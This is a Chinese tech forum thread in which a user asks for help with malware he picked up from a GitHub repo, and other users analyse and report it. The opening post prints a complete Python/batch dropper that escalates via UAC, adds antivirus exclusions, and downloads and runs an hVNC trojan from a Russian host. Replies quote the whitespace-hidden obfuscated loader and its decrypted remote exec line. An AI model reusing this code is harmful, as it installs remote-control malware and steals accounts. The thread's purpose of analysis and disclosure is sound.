请不要在回答技术问题时复制粘贴 AI 生成的内容
这是一个创建于 637 天前的主题,其中的信息可能已经有所发展或是发生改变。
代码传网盘了,有没有大佬能看看怎么办 https://www.alipan.com/s/ysPCcqoe5TT
第一个文件名是 hvnc.py
import os import subprocess script = """ import os def create_and_run_bat_script(): bat_script_cOntent= ''' @echo off set "filePath=%appdata%\Microsoft\emptyfile20947.txt" :: BatchGotAdmin :------------------------------------- REM --> Check for permissions IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" ) ELSE ( >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" ) REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( echo Requesting administrative privileges... goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params= %* echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" :-------------------------------------- mkdir "C:\Windows\WinEmptyfold" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'" set "temp_file=%TEMP%\hahabonk.exe" powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://bananasquad.ru/hvnc.exe', '%temp_file%')" start "" "%temp_file%" del /q "%appdata%\Microsoft\runpython.py" ''' temp_folder = os.environ.get('TEMP', '') if temp_folder: bat_script_path = os.path.join(temp_folder, 'temp_script.bat') with open(bat_script_path, 'w') as bat_file: bat_file.write(bat_script_content) os.system(bat_script_path) else: print("Failed to get the TEMP folder path.") if os.name == 'nt': folder_path = r"C:\Windows\WinEmptyfold" if os.path.exists(folder_path): exit() else: os.system('timeout 600') os.system('taskkill /f /im explorer.exe') create_and_run_bat_script() while True: os.system('timeout 5') if os.path.exists(folder_path): os.system('start explorer.exe') break else: create_and_run_bat_script() """ appdata = os.environ.get('APPDATA', '') if appdata: # create microsoft folder if it doesn't exist microsoft_folder = os.path.join(appdata, 'Microsoft') if not os.path.exists(microsoft_folder): os.mkdir(microsoft_folder) script_path = os.path.join(appdata, 'Microsoft', 'runpython.py') with open(script_path, 'w') as script_file: script_file.write(script) subprocess.Popen(['python', script_path], creatiOnflags=subprocess.CREATE_NO_WINDOW) 第 1 条附言 2024-02-28 16:09:32 +08:00
喜大普奔,恶意 repo 已经 404 了
62 条回复 2024-02-29 17:11:33 +08:00
 | 1 Jimmyisme OP 目前发现是在自启动中,但是我设置了 py 文件用 vscode 。可能就没有运行。  ) |
| 2 Jimmyisme OP 删除文件再 ctrl+z 撤回删除操作就被火绒拦截了。不是很懂为什么之前没有被发现。目前来看应该没什么大碍  ) |
 | 3 WoneFrank 2024-02-28 10:51:31 +08:00 nbsp;  1 一看就病毒啊,有突破 UAC ,还去这拉了个 exe: https://bananasquad.ru/hvnc.exe 。 可以看 virustotal: https://www.virustotal.com/gui/domain/bananasquad.ru/relations |
 | 4 AoEiuV020JP 2024-02-28 10:53:10 +08:00 2 有点搞笑了,投 python 病毒也不管电脑上有没有 python 环境,直接默认编辑器打开了, |
| 5 Jimmyisme OP 另一一个代码文件是(fernet)[https://github.com/oz123/python-fernet]加密的, https://imgur.com/AAYVOQn 解密后是这样的 https://imgur.com/Z0h00ad Kaggle notebook: https://www.kaggle.com/code/jimmyisme1/virus-check/notebook?scriptVersiOnId=164624730 |
| 7 Jimmyisme OP @AoEiuV020JP 幸好我默认设置.py 是用 vscode 打开。我发现我默认的 python 环境确实装了他这个脚本要运行的 fernet 库。 |
| 9 Jimmyisme OP 21 我知道是哪里来的了,真 nm 脑残啊 https://github.com/maqrtineLzjulyie/spotify-check-premium/blob/main/main.py 第一行的最后面。还有 nm 一段代码。艹了 之前刷到在舍友的 for 循环后面偷偷加分号,乐子人终成乐子。妈的 |
 | 12 cT4035xGkTUJ0Ce7 2024-02-28 11:32:01 +08:00 via Android 吓得我赶紧把自动折行打开 |
 | 13 chackchackGO 2024-02-28 11:34:41 +08:00 @Jimmyisme 为什么这个仓库有 4.5k 的 fork? 我没看明白 |
 | 14 morgan1freeman 2024-02-28 11:34:59 +08:00 @Jimmyisme #9 开源 也不是完全安全,还是得审核代码,问题太多了 |
 | 17 nekomiao 2024-02-28 11:40:11 +08:00 1 @chackchackGO fork 和 star 差这么多,明显是刷的 |
 | 18 inhzus 2024-02-28 11:40:57 +08:00 速速打开 toggle word wrap |
 | 19 Link99 2024-02-28 11:41:01 +08:00 牛逼 这干嘛用的啊 Fork 4.5k Star 6 ? |
| 20 Jimmyisme OP @chackchackGO #13 到处害人 |
 | 22 shinession 2024-02-28 11:55:41 +08:00 学到了一招, 还能这么玩的 |
 | 23 flyqie 2024-02-28 11:57:10 +08:00 via Android 感谢分享,涨知识了,已向 github 举报 |
 | 25 wangkun025 2024-02-28 12:00:43 +08:00 已经举报给 GitHub 了。 |
 | 26 Les1ie 2024-02-28 12:00:45 +08:00 恶意代码部分: ``` import os ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'yKpskffUwlXAGQtWJiXILDemLKDod4v8DpfKK3ClcHo=').decrypt(b'gAAAAABlv3l_ShNj4Sta_rsNaa9OI2cs0EyIBDdLPw6x4VVSxY9AYPGhGcOClTKrp_TBol_GE50_2GWBH3IfwUsOTJpM5PvjUgD939S4E75PGnNWs_qq9kk1mbhzcEuOumsWSm28OPbC6vs4CjgTliTihSbRedGIUvizU9JdEpFIQfkFU6sbmpBFR9kzI8ttiIoFqxLvEriZ6tvIumAuq_s-A65rXKflng==')) import requests import json ``` 利用超长的空格欺骗没有开启自动换行的编辑器,的确是未设想的添加后门的方式。这个方法究极简单却有用,稍有不慎我也可能中招了。 |
 | 27 CivAx 2024-02-28 12:01:14 +08:00 这个藏的有意思,已经向 github report-abuse 了。 |
 | 28 noahlias 2024-02-28 12:39:34 +08:00 看了一下 点开它的 fork 都是机器人 都是 2 周前注册的 而且他们的 repo 都有这段代码哈哈 应该都是钓鱼的 |
 | 29 ohmyhaha 2024-02-28 13:48:36 +08:00 hvnc....按理解这个是远控用的呢 |
| 31 Jimmyisme OP @ohmyhaha https://github.com/Meltedd/HVNC 开源的恶意软件 |
| 32 ohmyhaha 2024-02-28 13:59:57 +08:00 @Jimmyisme 是的。在另外一个隐藏桌面。这样你直接用你的浏览器登录你已经登录的网站或者应用。有效绕过 OPT 和风控 |
 | 33 straydragon 2024-02-28 14:04:45 +08:00 已举报, 这个思路很简单也很容易中招, 吓得直接开启自动折行了 |
 | 34 Rickkkkkkk 2024-02-28 14:11:48 +08:00 (这下知道代码规范里一行不能过长的道理了吧 |
 | 35 hikarugo 2024-02-28 14:25:01 +08:00 公共场合投毒啊,这些孙子 |
 | 36 NEPv5NA6R8R3Y11u 2024-02-28 14:29:31 +08:00 加密部分代码: exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>','')) 从这个网站获取代码去除前后标签后执行 |
| 37 NEPv5NA6R8R3Y11u 2024-02-28 14:43:54 +08:00 |
| 38 NEPv5NA6R8R3Y11u 2024-02-28 14:45:23 +08:00 这个人应该是制作脚本的人,看描述是不像是恶性攻击, |
 | 39 machenme 2024-02-28 15:02:36 +08:00 大概意思是先检测系统。如果是 NT 就执行,然后关闭 UAC ,获取管理员权限,然后下载一个那个 hvnc.exe 刚点进去被火绒杀了。建议删了吧 病毒名称:TrojanSpy/MSIL.Stealer.dr 病毒 ID:D7EE101A6EEFC320 |
 | 40 SoyaDokio 2024-02-28 15:08:09 +08:00 reported the repository. |
 | 42 kaleido 2024-02-28 15:54:42 +08:00 楼上投诉好像生效了,fork 只有个位数了 |
 | 43 wpyfawkes 2024-02-28 16:03:33 +08:00 话说上个月到官网下 sqlmap 里面有个文件也被卡巴斯基报毒了 |
 | 44 makerbi 2024-02-28 16:10:40 +08:00 我已经 report 了,Github 刚刚给我回复处理了 |
 | 45 qq316107934 2024-02-28 16:12:09 +08:00 report 得到答复了,不仅 repo 没了,号都被扬了,好 |
| 46 Jimmyisme OP 这个病毒,我估计是我自己手贱,UAC 点了 yes 。这种情况下,杀毒软件是不是已经没有用了?还是说只是火绒太拉。已经准备考虑付费卡巴斯基了 |
 | 47 Levox 2024-02-28 16:19:15 +08:00 重装吧 doge |
 | 49 silencil 2024-02-28 16:25:15 +08:00 这是什么项目? |
 | &bsp; 52 emma3 2024-02-28 17:04:45 +08:00 https://bananasquad.ru/hvnc.exe 这个.exe 是什么东西? |
 | 53 neetz 2024-02-28 18:25:39 +08:00 来晚了项目 404 了,github 上这个项目是干啥的? |
 | 54 thinkm 2024-02-28 18:28:40 +08:00 4 这个帖子我都打不开,关了杀软才能打开 |
| 55 wangkun025 2024-02-28 20:50:16 +08:00 @pujx233 检查是不是 spotify 的 premium 账号 |
 | 56 jeffson 2024-02-28 23:59:18 +08:00 via Android 666 |
 | 57 studyingss 2024-02-29 11:28:39 +08:00 @thinkm 什么杀软这么强? |
| 59 thinkm 2024-02-29 11:32:52 +08:00 @studyingss 卡巴斯基 |
 | 60 EeveeRibbon 2024-02-29 14:36:32 +08:00 via Android 卡巴斯基连网页都打不开,我用的远控没法关掉保护,只好拿手机看的帖子 |
| 61 Jimmyisme OP @qiaofanxing 刚买了半年的卡巴斯基。感觉弄得电脑好卡,之前软件都是秒开,现在都要等 2 秒以上。  |
 | 62 vainl1 2024-02-29 17:11:33 +08:00 1 |
Select Language